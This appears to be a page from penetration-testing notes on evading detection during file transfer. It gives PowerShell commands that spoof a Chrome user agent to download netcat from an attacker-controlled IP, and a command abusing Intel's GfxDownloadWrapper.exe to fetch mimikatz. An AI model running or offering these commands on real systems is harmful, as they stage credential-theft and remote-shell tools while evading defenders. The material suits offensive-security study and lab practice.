Detection

User Agent Changing

Invoke-Webrequest allows for changing the user agent to pretend to be a web browser.

Listing out User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Request with Chrome User Agent

$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

LOLBAS / GTFOBins

IF powershell and CMD may alert defenders, LOLbins can be used to hide requests

One example is the Intel Graphics Driver GfxDownloadWrapper.exe

Transferring File with GfxDownloadWrapper.exe

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

PreviousLiving Off the Land NextShells

Last updated 2 days ago

hashtagUser Agent Changing

hashtagLOLBAS / GTFOBins

User Agent Changing

LOLBAS / GTFOBins